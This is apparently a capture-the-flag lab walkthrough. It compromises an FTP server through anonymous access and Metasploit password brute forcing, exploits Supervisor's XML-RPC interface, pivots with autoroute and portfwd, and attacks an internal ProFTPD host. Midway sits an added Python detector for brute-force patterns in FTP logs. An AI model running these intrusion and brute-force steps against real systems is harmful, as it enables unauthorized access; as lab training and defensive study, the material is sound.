Steps Taken:
1. Scan the first target machine with NMAP:
- Port 21 (FTP) is open!
2. Preparing Metasploit:
3. Searching for an exploit and executing it:
- The target isn't vulnerable to this exploit!
4. Check whether anonymous users are allowed, using a Metasploit module:
msf > search anonymous
- Shows that anonymous login works, but you can only read files on the FTP server!
5. Now, log into the FTP server:
# ftp {ip}
6. Explore the file system of the FTP server and download any hint you can find:
- It tells us to log in using the 'administrator' account.
7. Logging into the 'administrator' account WITHOUT a password:
- The login failed. Try to brute force the password for this user, then!
- Note from previous experience: Hydra cannot tell us whether a given username actually exists on the FTP server, so brute forcing the password of an unknown user is not practical. In this case the username is known, so we can brute force its password. In other words, knowing which usernames exist on a server indirectly helps us acquire their passwords.
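From the server's side, steps 4, 7 and 8 leave a clear trace in the FTP daemon's log: an anonymous login followed by a burst of failed logins for one user from one client, then a success. The following detector is an added example, not part of the original write-up; the vsftpd-style log lines are constructed, and the log format, threshold and window size are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines in vsftpd.log style (assumed format, not from the lab machine).
SAMPLE_LOG = """\
Mon Mar  4 10:00:01 2024 [pid 2101] [anonymous] OK LOGIN: Client "10.0.0.7", anon password "IEUser@"
Mon Mar  4 10:00:40 2024 [pid 2108] [administrator] FAIL LOGIN: Client "10.0.0.7"
Mon Mar  4 10:00:41 2024 [pid 2109] [administrator] FAIL LOGIN: Client "10.0.0.7"
Mon Mar  4 10:00:41 2024 [pid 2110] [administrator] FAIL LOGIN: Client "10.0.0.7"
Mon Mar  4 10:00:42 2024 [pid 2111] [administrator] FAIL LOGIN: Client "10.0.0.7"
Mon Mar  4 10:00:42 2024 [pid 2112] [administrator] FAIL LOGIN: Client "10.0.0.7"
Mon Mar  4 10:00:43 2024 [pid 2113] [administrator] OK LOGIN: Client "10.0.0.7"
Mon Mar  4 11:30:00 2024 [pid 2200] [bob] FAIL LOGIN: Client "10.0.0.9"
Mon Mar  4 11:31:00 2024 [pid 2201] [bob] OK LOGIN: Client "10.0.0.9"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

def parse(log_text):
    """Return (timestamp, user, result, client_ip) for every login line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m['ts'], '%a %b %d %H:%M:%S %Y')
            events.append((ts, m['user'], m['result'], m['ip']))
    return events

def detect(events, threshold=5, window=timedelta(seconds=60)):
    """Flag anonymous logins, password-guessing bursts and a success right after one."""
    findings = []
    fails = defaultdict(list)   # (user, ip) -> timestamps of recent FAIL LOGIN lines
    flagged = set()
    for ts, user, result, ip in events:
        key = (user, ip)
        if user == 'anonymous' and result == 'OK':
            findings.append(('anonymous_login', user, ip))
            continue
        if result == 'FAIL':
            # sliding window: keep only failures within `window` of this one
            fails[key] = [t for t in fails[key] if ts - t <= window] + [ts]
            if len(fails[key]) >= threshold and key not in flagged:
                flagged.add(key)
                findings.append(('bruteforce', user, ip))
        elif key in flagged:
            findings.append(('success_after_bruteforce', user, ip))
    return findings

if __name__ == '__main__':
    for finding in detect(parse(SAMPLE_LOG)):
        print(finding)
```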
8. Bruteforcing the password of the user 'administrator':
- Trying PASS_FILE = /root/wordlists/100-common-passwords.txt : doesn't work!
- Trying PASS_FILE = /usr/share/wordlists/metasploit/password.lst : doesn't work!
- Trying PASS_FILE = /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt :
9. Logging into the FTP server using the 'administrator' account:
- Found the password!
- Now, download the 'files' directory!
# wget -r ftp://administrator:babygirl@192.27.155.3/
-> This is wrong since we won't need to download this directory.
10. Putting a file named 'startsuper' in the /files directory of the administrator account.
# touch startsuper
...(after logging in, in another terminal)
ftp > put startsuper
-> Note that this file path is relative to the directory you were in when you started the FTP client, which in this case is /root.
-> Recap: We did this because of a note:
11. Now, you have to wait for the "Supervisor" to run on the FTP server! Then, scan the target FTP machine with NMAP:
# nmap -sS -sV {target}
- A new port is now open, serving a new service, which in this case is the Supervisor process manager.
12. Using 'curl' to make a GET request to the new service:
# curl -v http://{target-ip}:9001
- Notice that at the moment there are no programs this service is managing.
13. Finding exploits this service is vulnerable to:
- This exploit affects Supervisor (Medusa) versions 3.0a1 to 3.3.2.
14. Using exploit/linux/http/supervisor_xmlrpc_exec:
- The exploit works!
15. Checking which internal subnet this compromised machine is also connected to:
16. Creating a pivot through this compromised machine:
msf > search autoroute
-> Set up autoroute
...
17. Portscan the internal subnet using the portscan/tcp Metasploit module:
msf > search portscan/tcp
...
- Set it up!
18. Do an NMAP scan on this internal network machine (2nd target).
- Use 'portfwd' in Meterpreter to forward the port, so you can run nmap locally without having to use proxychains.
meterpreter > portfwd add -l 1234 -p 21 -r 192.36.1.3
# nmap -sS -sV -p1234 localhost
- Note this is done in ANOTHER TERMINAL!
19. Check for an exploit for this ProFTPD version.
msf > search proftpd
...
20. Executing the exploit:
21. Find the flag and print it!
# find / -iname '*flag*'